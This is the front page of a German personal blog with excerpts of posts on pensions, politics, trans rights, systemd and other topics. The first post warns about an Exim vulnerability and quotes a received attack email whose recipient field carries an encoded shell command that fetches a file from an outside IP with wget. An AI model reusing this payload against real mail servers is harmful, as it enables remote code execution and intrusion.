Froschs Blog

Computer und was das Leben sonst noch so zu bieten hat

Zur Website | Impressum

Achtung, Exim-Bug unterwegs!

20. Juni 2019 um 16:51 Uhr von Atari-Frosch

Gestern erhielt ich zwei … „interessante“ E-Mails an den root-Account meines Servers. Der Body war jeweils leer. Der Header sieht so aus:

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Received: from service.com (flamingw.arvixecloud.com [108.175.157.131])
        by mail.atari-frosch.de (Postfix) with SMTP id B61EAC9E8;
        Wed, 19 Jun 2019 16:58:45 +0200 (CEST)

Darunter folgten noch 31 Received-Zeilen, die jedoch nur jeweils die Zahlen von 1 bis 31 enthielten. Die To:-Zeile ist dabei das Spannende: weiterlesen →

Altersrente, LOL

8. Juni 2019 um 18:07 Uhr von Atari-Frosch

Immer wenn es um die Rente geht, höre ich – auch und gerade von der SPD – solche Sätze wie „wenn man 35 Jahre lang gearbeitet hat, muß man eine auskömmliche Rente bekommen“ oder überhaupt die Sprüche von der harten Arbeit und so. Und jedesmal denke ich mir: Also erstens meint Ihr Einkommen, nicht Arbeit. Denn darauf, ob eins (abhängig, bezahlt – alles andere zählt ja nicht) gearbeitet hat, kommt es ja schon lang nicht mehr an, sondern darauf, wieviel eins verdienen durfte.

Und zweitens: Brauchen die, die das mit der Erzeugung von Einkommen nicht hinbekommen haben, aus welchen Gründen auch immer, im Alter nix? Oder wird gleich davon ausgegangen, daß einkommensarme und -lose Menschen gefälligst gar nicht so alt werden sollen, daß sie genügend hohe Rentenansprüche haben könnten?

Oury hat dazu heute einen Tweet verfaßt: weiterlesen →

Containern bleibt verboten

6. Juni 2019 um 18:31 Uhr von Atari-Frosch

Laut einem Bericht der Tagesschau von heute bleibt Containern weiterhin verboten. Dabei geht es um das Abgreifen größtenteils unverdorbener, noch genießbarer, gesundheitlich unbedenklicher Lebensmittel aus Supermarkt-Müllcontainern. Die Supermärkte werfen da nicht nur explizite Abfälle rein, sondern alles, was nicht mehr „schön“ aussieht oder ein überschrittenes Mindesthaltbarkeitsdatum hat oder am nächsten Tag bzw. nach einem Wochenende haben wird.

Wenn sie stattdessen gesagt hätten, wir einigen uns darauf, daß den Supermärkten (aber auch Zwischenhändlern wie Selgros usw.) verboten wird, genießbare Lebensmittel wegzuwerfen – und da muß auch gleich klar sein, daß sie sie nicht absichtlich ungenießbar machen dürfen –, wäre das für mich OK. Aber das wird offenbar gerade nicht gewollt. weiterlesen →

Zitat des Tages: Sie sind Nazis geblieben.

27. Mai 2019 um 14:33 Uhr von Atari-Frosch

Dem ist eigentlich nichts hinzuzufügen.

Eins aber vielleicht doch: Wer Nazis wählt, tut das nicht aus Unwissenheit oder weil sie nicht weit genug „entzaubert“ wurden. Wer Nazis wählt, will deren „Politik“, ist also selbst ein Nazi. Und ja, wir haben ein Nazi-Problem in Deutschland.

„Die Zerstörung der CDU“ von @rezomusik

23. Mai 2019 um 14:55 Uhr von Atari-Frosch

Gestern Abend und damit mit einigen Tagen Verspätung habe ich mir das Video Die Zerstörung der CDU von @rezomusik reingezogen, und was mich dabei vor allem fasziniert, ist die Präsentationsmethode.

Denn: Eigentlich wußten wir das alles. Oder konnten es zumindest wissen, denn alle Quellen, die Rezo verwendet, sind öffentlich.

Und ein Teil der Menschen in Deutschland hat das sicher auch reflektiert. Das eine Thema mehr, das andere weniger. Trotzdem gab es keine ernsthaften Diskussionen darüber. Mal ein Lacher hier über die Inkompetenz – gerade der Spruch von Mortler, daß Cannabis verboten sei, weil es illegal ist, ging ja herum –, mal Erschrecken über „Collateral Damage“, das Video aus dem Kampfhubschrauber, das Rezo nur angedeutet hat. Aber immer nur kurz, und im allgemeinen ohne nachhaltige Auswirkungen. weiterlesen →

systemd pfuscht ins Routing

17. Mai 2019 um 19:54 Uhr von Atari-Frosch

Ich wollte nie systemd auf meinem Server (oder sonstwo drauf) haben. Nun habe ich es seit dem letzten Distri-Update (auf Stretch bzw. Debian 9) doch drauf, trotz Pinning, also gegen meinen erklärten Willen. Bisher ging das gut, aber wie ich auch von anderen immer wieder lese, ist es nur eine Frage der Zeit, bis systemd Probleme macht. Heute war ich dran. Und ich hatte mal wieder 'ne sehr flache Lernkurve …

Dieser Tage kam ein Kernel-Update und ein Update auf intel-microcode, und ich hatte auch vorher schon einige Kernel-Updates gesehen, aber immer den nötigen Reboot verpeilt. Deshalb ist es durchaus möglich, daß mir dieses Problem schon früher hätte auffallen können, wenn ich denn rebootet hätte. Die Ursache war allerdings nicht der Kernel selbst, der war quasi nur Ausführender.

Nachdem ich dann heute endlich rebootet hatte, hatte ich plötzlich scheinbar ein Problem auf meinem lokalen PC. Dieser ist zwar per OpenVPN mit dem Server verbunden, trotzdem erschien es mir erst einmal unlogisch, daß ich hier ein Problem haben sollte, nachdem der Server rebootet hat. Daher suchte ich natürlich auch erst einmal lokal nach der Ursache. weiterlesen →

Automatisierte Nötigung

16. Mai 2019 um 16:27 Uhr von Atari-Frosch

Vor gut zwei Jahren hatte ich Strafanzeige gegen die Firma EOS SAF gestellt, weil die es völlig in Ordnung fand, mich durch Telefonterror zur Zahlung einer Altschuld zu nötigen. Kürzlich kam die Einstellung des Verfahrens durch die Staatsanwaltschaft Düsseldorf, obwohl es doch angeblich schon kurz nach Anzeigeerstattung an die Staatsanwaltschaft Potsdam abgegeben worden war (wohl, weil EOS da eines ihrer Callcenter unterhält). Die Begründung für die Einstellung der Ermittlungen ist … sagen wir, eigen:

Aufgrund der überwiegend maschinellen Bearbeitung bei der Firma EOS Holding GmbH gibt es dort keinen einzelnen zuständigen Sachbearbeiter. Es konnte daher nicht festgetsellt [sic] werden, wer sie [sic] wann angerufen hat.

weiterlesen →

Grundgesetz-Dissoziationen

13. Mai 2019 um 15:06 Uhr von Atari-Frosch

Wie vorausschaubar das war …

Und kaum ist der Hashtag #TSGReform nicht mehr in den Twitter-Trends, kommt auch schon Party-Stimmung bei den Grundgesetz-Mißachtern auf: weiterlesen →

Ich bin Aurin!

9. Mai 2019 um 18:10 Uhr von Atari-Frosch

Ich war lange nicht mehr so wütend. Ich habe lange nicht mehr so gehaßt, wenn überhaupt.

Es hat mangels öffentlicher Informationen und Aufklärung schon viel zu lange gedauert, bis ich meine Geschlechtsidentität herausfand. Dann gibt es da dieses unsägliche „Transsexuellengesetz“, dessen Inhalt genauso Bullshit ist wie sein Name: Denn es geht ja nicht um Sexualität, sondern um Geschlecht. Und berücksichtigt werden dabei wiederum nur die Geschlechter „Mann“ und „Frau“.

Nun soll dieses Gesetz, ähm, reformiert werden. Das wäre eine ganz große Chance gewesen, trans Menschen endlich das gleiche Recht zuzugestehen wie cis Menschen: Ihre Geschlechtsidentität eintragen zu lassen und zu leben. Es wäre die Chance gewesen, die eigentlich allen Menschen garantierten Rechte wie Menschenwürde, freie Entfaltung und Gleichheit vor dem Gesetz auch trans Menschen zu garantieren, denn für uns sind sie nicht garantiert. Aber diese „Reform“ wurde von einem CSU-geführten Innenministerium und dem Justizministerium unter der Umfaller-Partei SPD gemacht, und was dabei rauskam, ist eine Weiterführung der bisher angewandten Menschenverachtung. weiterlesen →

Bahn-Gutscheine

25. April 2019 um 14:57 Uhr von Atari-Frosch

Liebe Deutsche Bahn,

es scheint ja erstmal nett gemeint zu sein, wenn ich als BC50-Kunde immer mal wieder Mitfahrer-Gutscheine, wenn auch mit begrenzter Geltungsdauer und unter einschränkenden Kaufbedingungen, insbesondere mit Zugbindung, angeboten bekomme.

Ich vermeide aus guten Gründen jegliche Zugbindung (von der Sitzplatz-Reservierung mal abgesehen, auf die ich #ausgründen angewiesen bin). Deshalb kaufe ich auch keine „Super-Sparpreis“- und „Sparpreis“-Tickets. Denn insbesondere bei Rückfahrten habe ich schon mehrfach die Situation gehabt, daß ich die angepeilte Verbindung dann doch nicht nehmen konnte, weil sich vor Ort Pläne änderten oder, in einem Fall, weil ich krank wurde und daher eine Woche länger bleiben mußte. weiterlesen →

Firefox und das Caching

19. April 2019 um 14:25 Uhr von Atari-Frosch

Ach Firefox, Du übertreibst es manchmal echt mit dem Caching.

Ich hatte mir letztens für meine neuen beruflichen Pläne eine separate Domain gebucht und dafür natürlich auch den Server vorbereitet, also Mail (postfix) und Web (nginx). Ich war mir nur noch nicht mit mir einig gewesen, was ich da auf die Website draufsetzen sollte, also eine statische Website oder ein Blog oder vielleicht was ganz anderes?

Zunächst einmal rief ich aber mit dem Browser die Domain auf, um zu sehen, ob sie überhaupt sicher erreichbar ist. Ich hatte eine index.html draufgesetzt mit „Nothing here yet“ drin. Statt auf der neuen Domain landete ich jedoch auf meiner statischen Website. Huch? weiterlesen →

Zum Statement von Julia Reda

27. März 2019 um 23:16 Uhr von Atari-Frosch

Julia Reda hat heute ihren Austritt aus der Piratenpartei erklärt und dazu aufgerufen, die Piraten nicht ins EU-Parlament zu wählen. So sehr ich Julias Arbeit insbesondere zur Urheberrechts-Richtlinie zu schätzen weiß: Hier hat sie meiner Ansicht nach danebengegriffen.

Denn abgesehen davon, daß Julia die Kandidatur von Gilles, ihrem langjährigen Mitarbeiter im EU-Parlament, noch während der Aufstellungsversammlung im Juni in Sömmerda explizit beworben hat (hier berufe ich mich auf H3rmi, weil ich selbst nicht anwesend war), wurden die Vorwürfe gegen ihn erst drei Monate später überhaupt erst öffentlich bekannt. Die Aufstellungsversammlung wußte also nichts davon, sonst wäre er mit Sicherheit nicht gewählt worden. Das sollte auch Julia klar sein.

Außerdem: Der Wahlausschuß des Bundeswahlleiters hatte beschlossen, den Kandidaten nicht zu streichen, obwohl die Piratenpartei das wollte. Außerdem hatte Gilles im November selbst erklärt, zurückziehen zu wollen. So ziemlich alle waren negativ überrascht, als die Liste mit ihm und nicht ohne ihn bestätigt worden war. Julia wußte das oder hätte es wissen müssen. weiterlesen →

#WirSindDieBots!

23. März 2019 um 22:54 Uhr von Atari-Frosch

Heute fanden europaweit Demonstrationen gegen die sogenannte europäische Urheberrechtsreform (eigentlich, wie @alios richtig darlegt, eine Verwerterrechtsreform) statt. Mein Plan war es gewesen, nach Heidelberg zu fahren, um dort die von Alex Schestag angemeldete Demo zu unterstützen und zu fotografieren, aber dann funkte mir leider eine Hals- und (mal wieder) Luftröhrenentzündung dazwischen, und ich mußte zu Hause bleiben.

Das gab mir immerhin die Gelegenheit, mal zu versuchen, die Teilnehmerzahlen zumindest bei den Demos in Deutschland zusammenzutragen. Es war gar nicht so einfach gewesen, dem Hashtag #Artikel13Demo zu folgen; da kam einfach deutlich mehr pro Minute rein, als ein Mensch direkt mitlesen kann. Daher fragte ich bei einigen Leuten, die aus bestimmten Städten berichteten, auch gelegentlich direkt nach, wieviele „Bots“ denn gekommen waren. Das hier ist das vorläufige Ergebnis: weiterlesen →

Plötzlich gehbehindert

25. Februar 2019 um 23:40 Uhr von Atari-Frosch

So schnell kann's gehen. Heute Nachmittag wollte ich einen Spaziergang machen und ein bißchen fotografieren. Außerdem hoffte ich, daß sich meine verspannten Muskeln ein bißchen lockern, wenn ich mich bewege. Aber ich kam nicht weit. Ich war nach einem Rundgang um den Fürstenplatz durch die Hüttenstraße gelaufen und gerade dabei, die Ampeln zum Ernst-Reuter-Platz zu überqueren, da tat mir plötzlich ganz fürchterlich etwas „hinter“ dem und leicht oberhalb des linken Knies weh. Weitergehen war nicht drin.

Zum Glück ist das nicht weit von der Hausarztpraxis in der Hüttenstraße entfernt, zu der ich sonst gehe, wenn ich erkältet bin, oder auch, als ich vor ein paar Jahren die schlimme und immer wiederkehrende Gastritis gehabt hatte. Das waren vielleicht … 30 Meter? Oder 40? Du glaubst gar nicht, wie weit so eine Strecke sein kann, wenn ein Bein bei jedem Auftreten aufbrüllt und Dir damit deutlichst erklärt, daß Du das gefälligst bleiben lassen sollst. Eine Passantin hatte mich aufstöhnen gehört und bot mir ihren Arm zum Draufstützen an. Allerdings hatte ich den Eindruck, daß ich mich da besser nicht richtig draufstütze, weil sie mein Gewicht gar nicht halten konnte. weiterlesen →

Spaß mit GPS

16. Februar 2019 um 21:39 Uhr von Atari-Frosch

Am 16. Januar kam mein „neuer“ (gebrauchter) GPS-Empfänger für die Canon EOS 750D an. Freude! Das Teil, das auf den Blitzschuh gesteckt wird, sollte mir nicht nur zukünftig alle Fotos geotaggen, sofern ich im Freien bin, sondern auch gleich noch die Uhr der Kamera nachstellen. Vor allem das automatische Geotagging wird mir in Zukunft eine Menge Arbeit ersparen und zugleich vermutlich genauere Daten liefern, als wenn ich das im Nachhinein mühsam über das OpenStreetMap-Plugin von Piwigo versuche. Das Gerät mit der Bezeichnung Canon GP-E2 ist gar nicht so einfach zu bekommen, was mich etwas wundert. Sind die Leute denn nicht daran interessiert, im Nachhinein zu wissen, wo genau eine bestimmte Aufnahme gemacht wurde? Lieber Rätselraten? Ich weiß ja nicht.

Routen aufzeichnen kann das Gerät zwar auch noch, aber abgerufen werden können diese Daten dann nur mit einer Windows-Software. Ich probiere gar nicht erst aus, ob die unter wine laufen würde. Denn wenn ich Routen haben will, kann ich dafür einfacher das Smartphone nehmen. Mir kommt es aber ausschließlich auf die Koordinaten in den EXIF-Daten an. weiterlesen →